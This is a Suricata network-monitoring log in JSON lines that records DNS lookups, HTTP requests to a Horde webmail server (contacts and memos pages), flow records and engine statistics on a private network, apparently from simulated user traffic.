{"timestamp":"2020-02-29T00:19:03.129636+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42079,"proto":"UDP","dns":{"type":"answer","id":5765,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:03.129636+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42079,"proto":"UDP","dns":{"type":"answer","id":5765,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:03.235603+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4896}} {"timestamp":"2020-02-29T00:19:05.000328+0000","flow_id":880338066172632,"event_type":"flow","src_ip":"192.168.10.81","src_port":52770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6726,"start":"2020-02-29T00:17:59.486104+0000","end":"2020-02-29T00:18:04.703495+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:05.227899+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38040,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":8765,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:05.336483+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38040,"proto":"UDP","dns":{"type":"answer","id":8765,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:05.336483+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38040,"proto":"UDP","dns":{"type":"answer","id":8765,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:05.357307+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:19:05.357307+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":18,"tx_id":0}} {"timestamp":"2020-02-29T00:19:06.004062+0000","flow_id":390853513012744,"event_type":"flow","src_ip":"192.168.10.122","src_port":37310,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:05.878088+0000","end":"2020-02-29T00:14:05.986371+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:06.940891+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4896},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":24479,"tx_id":2}} {"timestamp":"2020-02-29T00:19:06.949852+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:07.058440+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56980,"proto":"UDP","dns":{"type":"answer","id":32844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:07.058440+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56980,"proto":"UDP","dns":{"type":"answer","id":32844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:07.518601+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20686}} {"timestamp":"2020-02-29T00:19:08.001030+0000","flow_id":779573836303470,"event_type":"flow","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":16,"bytes_toserver":2187,"bytes_toclient":13917,"start":"2020-02-29T00:17:26.380014+0000","end":"2020-02-29T00:18:07.306799+0000","age":41,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:09.000565+0000","flow_id":2196762722510294,"event_type":"flow","src_ip":"192.168.10.130","src_port":34868,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1217,"bytes_toclient":8358,"start":"2020-02-29T00:18:03.337366+0000","end":"2020-02-29T00:18:08.631591+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:10.000202+0000","event_type":"stats","stats":{"uptime":14802,"capture":{"kernel_packets":136642,"kernel_drops":0},"decoder":{"pkts":136671,"bytes":93872046,"invalid":192,"ipv4":135136,"ipv6":10,"ethernet":136671,"raw":0,"null":0,"sll":0,"tcp":129689,"udp":5240,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2814,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2830,"synack":2821,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1851,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2399,"failed_udp":112},"tx":{"http":4725,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2479}},"flow_mgr":{"closed_pruned":2796,"new_pruned":17,"est_pruned":2455,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":192948,"memcap":0}}} {"timestamp":"2020-02-29T00:19:10.358985+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34880,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:19:11.635244+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30835,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:11.743356+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58238,"proto":"UDP","dns":{"type":"answer","id":30835,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:11.743356+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58238,"proto":"UDP","dns":{"type":"answer","id":30835,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:11.811458+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:19:11.811458+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":221,"tx_id":0}} {"timestamp":"2020-02-29T00:19:11.823800+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51082,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60096,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:11.928718+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51082,"proto":"UDP","dns":{"type":"answer","id":60096,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:11.928718+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51082,"proto":"UDP","dns":{"type":"answer","id":60096,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:12.005216+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5166}} {"timestamp":"2020-02-29T00:19:12.518903+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20686},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":3}} {"timestamp":"2020-02-29T00:19:16.000180+0000","flow_id":1132834899264066,"event_type":"flow","src_ip":"192.168.10.130","src_port":34872,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1079,"bytes_toclient":5842,"start":"2020-02-29T00:18:10.754242+0000","end":"2020-02-29T00:18:15.965476+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:17.000278+0000","event_type":"stats","stats":{"uptime":14809,"capture":{"kernel_packets":136693,"kernel_drops":0},"decoder":{"pkts":136697,"bytes":93881203,"invalid":192,"ipv4":135160,"ipv6":10,"ethernet":136697,"raw":0,"null":0,"sll":0,"tcp":129709,"udp":5244,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2815,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2831,"synack":2822,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1852,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2401,"failed_udp":112},"tx":{"http":4727,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2481}},"flow_mgr":{"closed_pruned":2797,"new_pruned":17,"est_pruned":2455,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20174,"memcap_state":0,"memcap_global":0},"http":{"memuse":188756,"memcap":0}}} {"timestamp":"2020-02-29T00:19:17.000992+0000","flow_id":588464974095740,"event_type":"flow","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":2873,"bytes_toclient":7803,"start":"2020-02-29T00:18:06.812412+0000","end":"2020-02-29T00:18:16.581516+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:17.006111+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34882,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5166},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":23270,"tx_id":1}} {"timestamp":"2020-02-29T00:19:17.310431+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46219,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57979,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:17.418887+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46219,"proto":"UDP","dns":{"type":"answer","id":57979,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:17.418887+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46219,"proto":"UDP","dns":{"type":"answer","id":57979,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:17.482856+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:19:17.482856+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:19:17.489512+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1366,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:17.594290+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35956,"proto":"UDP","dns":{"type":"answer","id":1366,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:17.594290+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35956,"proto":"UDP","dns":{"type":"answer","id":1366,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:17.663401+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4062}} {"timestamp":"2020-02-29T00:19:19.000177+0000","flow_id":2124693171580563,"event_type":"flow","src_ip":"192.168.10.130","src_port":34870,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1171,"bytes_toclient":6579,"start":"2020-02-29T00:18:07.306835+0000","end":"2020-02-29T00:18:17.541754+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:22.667497+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34884,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4062},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19291,"tx_id":1}} {"timestamp":"2020-02-29T00:19:24.000190+0000","event_type":"stats","stats":{"uptime":14816,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2455,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20836,"memcap_state":0,"memcap_global":0},"http":{"memuse":35546,"memcap":0}}} {"timestamp":"2020-02-29T00:19:29.000573+0000","flow_id":645029679087548,"event_type":"flow","src_ip":"192.168.10.122","src_port":51842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:28.540604+0000","end":"2020-02-29T00:14:28.697243+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 